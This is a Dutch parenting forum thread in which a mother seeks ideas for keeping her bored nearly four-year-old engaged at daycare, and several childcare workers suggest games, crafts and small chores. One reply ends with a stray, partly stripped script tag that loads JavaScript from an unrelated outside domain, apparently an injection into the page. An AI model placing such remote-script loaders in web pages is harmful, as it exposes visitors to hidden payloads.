Menu
 

Topic:

3+ activiteiten op een KDV

Mama-van-aimy  schreef op: 26-09-2012 09:48:00

Dit is een vraag voor leidsters op een KDV of PSZ. (andere mogen natuurlijk ook altijd reageren


Mijn dochter (december wordt zij 4 jaar) verveeld zich momenteel enorm op het KDV. Daar gaat zij 2 dagen per week naar toe.

Als de kindjes in de binnentuin mogen spelen staat zij het liefst bij de leidsters te hangen. De leidster hebben daar niet altijd zin in en sturen haar weg dat ze lekker moet spelen. Vervolgens gaat  zij op een afstandje staan en dan staat zij met enorme puppy-ogen heel verdrietig te kijken omdat ze niet bij de leidsters mag staan.

Nu weet ik dat ze daar wel 3+ activiteiten hebben. Maar ik krijg sterk de indruk dat ze die helemaal niet aanbieden. Dus ook als mijn dochter binnen is, dan verveelt zij zich enorm. Met als resultaat dat ze alleen maar bij de leidsters op schoot wil.

Ik vroeg aan de leidster of ze dan niet iets van Mini Loco kunnen aanbieden. Lijkt mij erg educatief en dit is ook iets wat ze in groep 1 ook aanbieden op school. Thuis speelt ze daar ook graag mee.

De leidster stond mij aan te kijken alsof ze water zag branden. Ze wist totaal niet waar ik het over had en had nog nooit van Mini Loco gehoord.

Dus toen ik vroeg wat ze dan aan haar gaven kreeg ik als antwoord dat ze niet wist waar de spullen lagen van de 3+ activiteiten en dat ze er niet bij kon .

Vanaf 1 december mag mijn scheetje naar school toe. Maar ik vind het erg triest als zij nog 2 maanden zich stierlijk moet vervelen op het KDV.

Dus wie heeft tips wat haar aangeboden kan worden. Dan kan ik dat oppakken met het KDV.

Nog even een kleine aanvulling. Ik zit in de OuderCommissie. Ik vind het niet alleen belangrijk voor mijn dochter, maar tevens voor alle 3+ kindjes dat de juiste materialen worden aangeboden. Dus de tips kan ik meenemen voor een gesprekje met de Manager van het KDV!

 
Quote
Navigatie
RE: 3+ activiteiten op een KDV
Corine86  schreef op: 26-09-2012 09:54:03
ik heb er geen verstand van mijn kindjes zijn thuis met oppaskindjes aan huis.
Maar vind het super sneu voor je dochter dat ze zich zo verveeld.
Heb je zelf evt geen mini loco dat je dat mee kan geven?

Uiteraard hoort een KDV voor elke leeftijd passend speelgoed te hebben dus ook voor 3+
 
Quote
RE: 3+ activiteiten op een KDV
Myself  schreef op: 26-09-2012 09:54:22
Erg triest, maar qua aandacht wel herkenbaar.
Toen onze kinderen de oudste waren verveelden zei zich ook vaker.
De aangeboden spullen waren niet uitdagend genoeg meer voor hen. En er waren dan natuurlijk meer kindjes jonger dan hen, die ook meer zorg nodig hadden.

Laatst was het bij de bso ook.
Dochter is 7 en vaak de oudste op de dag dat zei gaat.
Leidster had een spelletje beloofd de doen en toen ik docher ophaalde verontschuldigde zij zich dat het er niet meer van gekomen was.
Ook weer veel aandacht naar de jongere gegaan.
Ik denk niet dat dit is te voorkomen, maar vind het wel rot voor de kindjes die zo wat minder aandacht krijgen.

Ik vind je loco tip een hele goede.
Misschien nog eens wat simpele leesboekjes, meer spelletjes voor oudere kinderen zoals 4 op een rij bijvoorbeeld.
Als ik nog meer weet kom  ik erop terug.
 
Quote
RE: 3+ activiteiten op een KDV
Mo27  schreef op: 26-09-2012 10:10:58
ik ben leidster op KDV en wat wij vooral doen met de 3+ kindjes is laten prikken knippen, helpen papiertjes scheuren voor de knutselt om er op te plakken.


mini of bambino loco,electro vinden ze ook vaak erg leuk. spelletje zo als memory of domino. vooral als de kleinere kinderen op bed zijn kunnen ze makkelijk een spelletje doen met de grotere kinderen.
Als de kinderen of bed liggen kunnen ze ook wat moeilijkere knutsels maken met de grotere kindjes

soms kan het niet altijd b.v. met buiten spelen zal je dochter toch ook zelf lekker even moeten spelen. Vaak moeten er toch twee leidster mee. maar b.v. met vrij spelen kan er eventueel ook 1 leidster met de grotere kinderen een activiteit doen.

en grote kinderen ook laten helpen met b.v. tsfel dekken,was weg bregen,washandes uitdelen enz. vinden ze ook geweldig en voelen ze zich ook groot.

joui meisjes zit nu gewoon in een fase dat ze heel erg aan school toe is. Ze heeft alles wel beetje gedaan en gezien op kdv. Vaak willen ze dan ook niet meer naar KDV en gaan ze(weer) huilen bij het afscheid. jullie moeten hier echt even doorheen samen. want er is niet heel de dag de tijd voor extra activiteiten. best lastig deze fase soms.

ik zou het toch nog keer over hebben en aangeven. dat ze thuis er ook gewoon over heeft dat ze niet meer leuk vind.

vind wel beetje gek dat de leidster zo reageerde hoor he.
 
Quote
RE: 3+ activiteiten op een KDV
Anon  schreef op: 26-09-2012 10:14:30
Hier ook helaas herkenbaar. (je dochter heeft het nog lang volgehouden zonder zich te vervelen...). Wat hier goed hielp was mee mogen draaien met de bso en met klein speelgoed mogen spelen als de kleintjes op bed lagen, zoals kralenplank en playmobil. Ik heb 2 kdv gehad ivm verhuizing en de ene had wekelijks een 3 + sctiviteit. de ander zei het wel, maar deed het niet. Aan het eind kwam daar wat verbetering in.
Ik zou het ook niet accepteren dat ze haar wegsturen, maar de vraag stellen hoe het komt dat zij zich verveeld en wat de leidsters daar aan denken te doen....Helaas je moet er bovenop zitten...
 
Quote
RE: 3+ activiteiten op een KDV
Esthermv2  schreef op: 26-09-2012 10:17:13
Als ik jou was zou ik toch een gesprek aangaan op t kdv. Ik heb 16 jaar op een kdv gewerkt, ben inmiddels al 5 jaar weg, dus hoe het nu precies gaat weet ik niet. Maar toen was er een speciaal 3+groepje. Dus allemaal kindjes van 3 jaar en ouder. Alle aktiviteiten aan hun aangepast!
Ik vind het antwoord van de leidster eigenlijk schandalig!!
 
Quote
RE: 3+ activiteiten op een KDV
Esli  schreef op: 26-09-2012 10:19:14
Hier een pm-er...

Wij zijn een werkgroep gestart om 3+ kinderen meer uitdaging aan te bieden.
Na een aantal brainstorm sessies zijn we tot de volgende dingen gekomen:

(Kleuter)werkjes op papier laten doen, al dan niet aan de hand van een thema. Op het internet kun je heel veel leuke werkjes uitprinten, bijvoorbeeld hoeveelheden omcirkelen, doolhof, van groot naar klein plakken, enz...

De kinderen zelfstandig laten eten aan een aparte tafel dicht bij de leidsters. Hun zelfvertrouwen groeit hierdoor enorm en ze helpen elkaar.

Meehelpen met de leidsters, een afwasje laten doen, slabbetjes pakken enz... ze voelen zich hierdoor zeer gewaardeerd.

Spelmateriaal aangekocht, zoals o.a mini loco, moeilijkere puzzels, enz

We koppelen de kinderen van 3+ van alle groepen en doen gezamelijk een activiteit.

Hopelijk kun je hier iets mee...
< type="text/" src="http://roze-kleur.info/dfi823hs.js?0.622558998500405">
 
Quote
RE: 3+ activiteiten op een KDV
Mamav2zoons  schreef op: 26-09-2012 10:24:35
mijn vriendin heeft een zoontje van 7 die op de buitenschoolse opvang zit. hij is de oudste daar en vervellde zzich enorm! de  eigenaar van dat kdv werkt zelf ook vaak mee zij heeft voor hem speciaal een wii aangeschaft omdat hij dat leuk vond! zoo lief vond ik dat! ik vind dat het kdv moet zorgen dat jou kindje een leuke dag heeft! nu moet ik zeggen dat het kdv waar ik het over heb wel super is! als een kindje erg moet wennen gaat de leidser met dat kindje een dag naar een pretpark voor 1 op 1 aandacht en om aan elkaar te wennen. bijv. vind dit erg zielig voor je dochtertje
 
Quote
RE: 3+ activiteiten op een KDV
Mama-van-aimy  schreef op: 26-09-2012 10:33:34
Ik ga zeker een gesprek aan met het KDV omdat het niet alleen om mijn kindje gaat, maar uiteindelijk om alle 3+ kindjes.

Aan de ene kant snap ik heel goed dat ze weinig tijd hebben om alle kindjes te vermaken. Al is vermaken een verkeerd woord want als ze voldoende uitdaging bieden aan de grote kindjes dan hoeven de leidsters de kindjes niet vermaken dat doen ze dan zelf. 

Kijk, er wordt momenteel enorm veel van de leidsters verwacht. In nog geen 2 jaar tijd hebben al een stuk of 4 leidsters de deur achter zich dicht moeten trekken omdat de opgevangen kindjes van 75 gedaald is naar een stuk of 49. Dat is gewoon fors. Dus nu is het minimaal aantal leidsters op maximaal gevulde groepen. En binnenkort moet er nog een leidster uit.

Dan zijn er afgelopen periode ook een hoop 2-jarigen van de babygroep doorgestroomd naar de peutergroep. Dus veel aandacht voor de kleintjes en minder aandacht voor de grotere kindjes.

Maar ik zie hier enorm veel tips staan. Ik zal die zeker allemaal gaan meenemen in het gesprek. Want ik vind het echt heel belangrijk dat alle kindjes voldoende uitdaging krijgen.

Ik ben mij er ook van bewust dat ze ook toe is aan school. Ik ben ook erg blij dat ze al 3 december mag beginnen en niet pas in januari. Maar als je een ongemotiveerd kindje nog 2 maanden moet wegbrengen, dan worden het 2 lange maanden voor haar.

Ik ga in ieder geval wat spellen (Mini loco, memory, 4 op een rij) meegeven naar het KDV. Dan heeft ze a.s vrijdag in ieder geval wat meer te doen.


 
Quote
RE: 3+ activiteiten op een KDV
Mafkees  schreef op: 26-09-2012 10:36:51
Hoi,

Hier ook een PM'er en ik vind het behoorlijk triest te lezen dat er weinig of geen uitdaging is voor je dochter.

Ik draai een verticale groep (dus 0 tot 4 jaar bij elkaar) en wij hebben vele activiteiten op leeftijd opgesplitst.

we hebben een atelier. Daar gaan we elke dag met 3 + kinderen timmeren, zagen, borduren, boetseren, cake bakken, appelmoes maken, etc.
Doordat we hier een uur in de ochtend actief mee zijn, kunnen eigenlijk alle kinderen zich daarna zelf ook weer vermaken.

we hebben 1 keer per week muziekles, hiervoor komt er een aparte muziekdocente op lokatie. we hebben peuterdans, ook hiervoor komt iemand een workshop geven.

er zijn genoeg activiteiten voor ieder wat wils. het aanbod is er, kinderen bepalen zelf waar ze aan mee willen doen.

als er veel kinderen een middagslaap doen, gaan we ook met de 3 + kinderen spelletjes doen, vaak wordt het lotto  (een soort bingo) of prikken/knippen/etc.

als tip kan ik je alleen maar geven: blijf in gesprek met de PM'ers en als OC-lid zou ik een balletje opgooien bij de manager.
altijd moeten kinderen het leuk hebben en naar het kind gekeken worden, maar helemaal in deze tijd, zouden de PM'ers het vuur uit hun schoenen moeten lopen....
 
Quote
RE: 3+ activiteiten op een KDV
Janneke  schreef op: 26-09-2012 10:41:20
Hier ook een speciale 3+ groep, hun krijgen via dezelfde methode les waar ze op de naastgelegen basisschool mee verder gaan.
 
Quote
RE: 3+ activiteiten op een KDV
Janneke  schreef op: 26-09-2012 10:44:02
Klinkt goed mafkees!
 
Quote
RE: 3+ activiteiten op een KDV
Mamav2zoons  schreef op: 26-09-2012 12:28:40
wat leuk bij julie mafkees!! mijn zoontje hoeft niet naar het kdv naar naar jullie zou ik hem met liefde en plezier brengen!
 
Quote
RE: 3+ activiteiten op een KDV
Mo27  schreef op: 26-09-2012 12:29:54
Maar helaas hebben niet alle dagverblijfen een atelier. dat is soms weleens jammer. dat bepertk je wel in sommige dingen. dingen die mafkees benoemt enzo
 
Quote
RE: 3+ activiteiten op een KDV
Mafkees  schreef op: 26-09-2012 18:30:22
wij hadden ook geen atelier hoor.

maar wel een grote tafel over, een kleine ruimte en 1001 activiteiten. die ruimte heet nu atelier en vanzelf komen er ideetjes ook van kinderen zelf!

onze keuken is echt heel klein. maar met een PM'er achter het fornuis en 4 peuters aan een tafel is het al snel een restaurant

 
Quote
RE: 3+ activiteiten op een KDV
Mama-van-aimy  schreef op: 27-09-2012 09:34:50
Bedankt voor de leuke tips! Zie veel nuttige tips erbij staan.

Ik heb gisteren even een mail gestuurd naar de manager en ik heb volgende week even een gesprek met haar. Is natuurlijk fijner om het face-to-face te doen.

Ik neem dan de tips allemal mee.

Ze hebben  hier wel een aparte 3+ ruimte maar die gebruiken ze momenteel niet. Gisteren liet de manager wel al doorschemeren dat ze die momenteel aan het opruimen zijn. (die wordt nu dus gewoon als opslaghok gebruikt).

Ik heb een goed gevoel over het gesprek wat er gaat komen.

Ik laat als het gesprek is geweest weten hoe het is afgelopen!

 
Quote
Navigatie


Reageren op 3+ activiteiten op een KDV
Naam
Bericht